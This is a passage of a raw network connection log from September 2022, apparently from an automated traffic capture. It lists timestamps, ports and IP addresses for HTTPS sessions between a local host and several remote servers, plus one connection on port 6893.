                                                                                                                                                                                      Sep 29, 2022 14:50:08.753209114 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.753305912 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:08.753814936 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:08.753860950 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.800215006 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.807096004 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:08.807148933 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.832740068 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.832854986 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.832945108 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.832952023 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:08.833060980 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:08.833815098 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:08.835515022 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:08.835578918 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.836101055 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:08.836278915 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:08.836333990 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.883932114 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:08.886581898 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:08.886640072 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.121150017 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.123450994 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.123486996 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.123585939 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.123605967 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.123665094 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.123975992 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.127024889 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.127099991 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.127146006 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.127161026 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.127274036 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.138171911 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.138232946 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.138364077 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.138364077 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.138396978 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.140727043 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.140763998 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.141098022 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.141098022 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.141130924 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.142138004 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.142184973 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.142239094 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.142268896 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.142920017 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.143935919 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.143965960 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.144340992 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.144340992 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.144370079 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.152498007 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.152558088 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.152693987 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.152693987 CEST49726443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:09.152717113 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:09.153938055 CEST44349726185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:21.919708014 CEST4434969023.50.106.206192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:21.919747114 CEST4434969023.50.106.206192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:21.919828892 CEST49690443192.168.2.623.50.106.206
                                                                                                                                                                                      Sep 29, 2022 14:50:28.913455963 CEST49746443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:28.913507938 CEST44349746140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.913615942 CEST49746443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:28.914062023 CEST49746443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:28.914079905 CEST44349746140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.954142094 CEST44349746140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.968149900 CEST49746443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:28.968187094 CEST44349746140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.988039017 CEST44349746140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.988157988 CEST44349746140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.988240957 CEST49746443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:28.988254070 CEST44349746140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.988312960 CEST49746443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:28.989449978 CEST49746443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:28.990489960 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:28.990556002 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:28.990655899 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:28.991329908 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:28.991369009 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.037108898 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.045599937 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.045644045 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.224934101 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225086927 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225176096 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225265980 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225303888 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225471973 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225539923 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225558043 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225657940 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225732088 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.225745916 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.226210117 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.226298094 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.226319075 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.226376057 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.226386070 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.227013111 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.227058887 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.227091074 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.227116108 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228204966 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228279114 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228336096 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228362083 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228382111 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228466034 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228533983 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228589058 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228604078 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.228734016 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.229315996 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.230079889 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.230115891 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.230148077 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.230154991 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.230181932 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.230200052 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.230911016 CEST44349747185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:29.231005907 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:29.233753920 CEST49747443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:34.918983936 CEST49754443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:34.919066906 CEST44349754140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:34.919190884 CEST49754443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:34.919593096 CEST49754443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:34.919615030 CEST44349754140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:34.966368914 CEST44349754140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:34.974948883 CEST49754443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:34.974996090 CEST44349754140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.175749063 CEST44349754140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.175858974 CEST44349754140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.175941944 CEST44349754140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.175978899 CEST49754443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:35.176014900 CEST49754443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:35.201380014 CEST49754443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:50:35.202347994 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.202403069 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.202481985 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.202826023 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.202861071 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.241030931 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.297909021 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.297944069 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.481759071 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.481879950 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.481930017 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.481978893 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482023954 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482024908 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482073069 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482098103 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482124090 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482549906 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482662916 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482712984 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482724905 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.482988119 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.483057976 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.483071089 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.483804941 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.483865023 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.483886003 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.483900070 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.483941078 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:35.484461069 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.484551907 CEST44349755185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:35.484627008 CEST49755443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.890186071 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.890199900 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.890214920 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.890646935 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.890907049 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.890932083 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891012907 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891026020 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891184092 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891207933 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891290903 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891303062 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891328096 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891925097 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891969919 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.891994953 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892055988 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892071962 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892082930 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892147064 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892163992 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892568111 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892790079 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892870903 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892905951 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892959118 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892967939 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.892999887 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893018961 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893277884 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893300056 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893366098 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893378019 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893450022 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893476963 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893512011 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893512011 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893526077 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893543959 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893583059 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.893743038 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894366980 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894398928 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894423008 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894475937 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894486904 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894517899 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894542933 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.894891977 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.895109892 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.897876978 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.897907972 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.898037910 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.898061991 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.898158073 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902456045 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902482986 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902627945 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902658939 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902717113 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902774096 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902796984 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902848959 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902865887 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902909994 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.902925968 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903160095 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903215885 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903247118 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903261900 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903276920 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903304100 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903482914 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903534889 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903558016 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903569937 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903614044 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903637886 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903685093 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903707027 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903755903 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903765917 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903810024 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903826952 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903878927 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903899908 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903944969 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903955936 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903983116 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.903999090 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.904597044 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.904622078 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.904670954 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.904683113 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.904710054 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.904721975 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905086040 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905101061 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905181885 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905194998 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905246019 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905291080 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905309916 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905359983 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905369997 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905405998 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905424118 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905494928 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905514956 CEST44349760185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905576944 CEST49760443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:51:24.905591011 CEST44349760185.199.108.133192.168.2.6
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                      Sep 29, 2022 14:50:24.536484003 CEST590836893192.168.2.695.1.200.7
